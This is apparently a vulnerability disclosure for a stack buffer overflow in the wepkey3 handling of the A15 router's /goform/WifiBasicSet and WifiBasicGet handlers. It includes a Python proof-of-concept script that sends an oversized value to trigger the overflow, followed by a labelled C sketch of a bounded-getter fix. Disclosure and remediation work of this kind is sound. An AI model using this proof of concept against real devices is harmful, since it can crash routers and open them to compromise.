We found a stack buffer overflow vulnerability in the **A15** (firmware version V15.13.07.13).
In the handler function for the action `/goform/WifiBasicSet`, the user-controlled string `wepkey3` is stored into `wl2g.extra.wep_key3` via `SetValue`.
Later, in the handler for `/goform/WifiBasicGet`, the string is loaded from `wl2g.extra.wep_key3` and copied into the stack buffer `wifi_buf_entry`. Because the length of `wepkey3` is never checked, a large string overflows the stack buffer.

```python
import requests

cookie = {"Cookie": "uid=1234"}

# Step 1: store an oversized wepkey3 value through the Set handler.
url1 = "http://192.168.17.221:80/goform/WifiBasicSet"
data1 = {"wepkey3": "a" * 0x1000,
         "security": "wep"}
response = requests.post(url1, cookies=cookie, data=data1)

# Step 2: the Get handler loads the stored value into the stack buffer.
url2 = "http://192.168.17.221:80/goform/WifiBasicGet"
data2 = {}
response = requests.post(url2, cookies=cookie, data=data2)
print(response.text)
print(response)
```

The `GetValue` function should accept a length argument to avoid the buffer overflow.
0x00446748
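
The following is an added example, not the vendor's code and not part of the original report. It sketches the suggested fix as a getter that takes the destination size, plus a WEP key format check for the Set side. The one-entry store, the names `cfg_set`, `cfg_get_bounded` and `wep_key_valid`, and the 64-byte size of `wifi_buf_entry` are all assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed one-entry stand-in for the config store; all names are hypothetical. */
static char store_key[32], store_val[0x1100];

/* Set side: a WEP key is 5 or 13 ASCII characters, or 10 or 26 hex digits. */
int wep_key_valid(const char *k) {
    size_t n = strlen(k);
    if (n == 5 || n == 13) return 1;
    if (n != 10 && n != 26) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isxdigit((unsigned char)k[i])) return 0;
    return 1;
}

/* Stand-in for SetValue: stores whatever fits, with no WEP format check,
 * so the getter below can be exercised against an oversized value. */
int cfg_set(const char *key, const char *val) {
    if (strlen(key) >= sizeof store_key || strlen(val) >= sizeof store_val) return -1;
    strcpy(store_key, key);
    strcpy(store_val, val);
    return 0;
}

/* Bounded getter: the caller passes the destination size. Returns -1 on an
 * unknown key or a value that does not fit, and never writes past dstlen. */
int cfg_get_bounded(const char *key, char *dst, size_t dstlen) {
    if (dstlen == 0) return -1;
    dst[0] = '\0';
    if (strcmp(key, store_key) != 0) return -1;
    size_t n = strlen(store_val);
    if (n >= dstlen) return -1;          /* refuse instead of truncating */
    memcpy(dst, store_val, n + 1);
    return 0;
}

int main(void) {
    static char big[0x1001];
    char wifi_buf_entry[64];             /* size is an assumption */
    memset(big, 'a', 0x1000);            /* constructed oversized value */
    printf("validator accepts oversized key: %d\n", wep_key_valid(big));
    cfg_set("wl2g.extra.wep_key3", big); /* simulate a value already stored */
    printf("bounded get: %d\n",
           cfg_get_bounded("wl2g.extra.wep_key3", wifi_buf_entry, sizeof wifi_buf_entry));
    return 0;
}
```

Checking on both sides matters here: an oversized value saved before a Set-side check existed would still reach the Get handler, so the getter has to enforce the bound on its own.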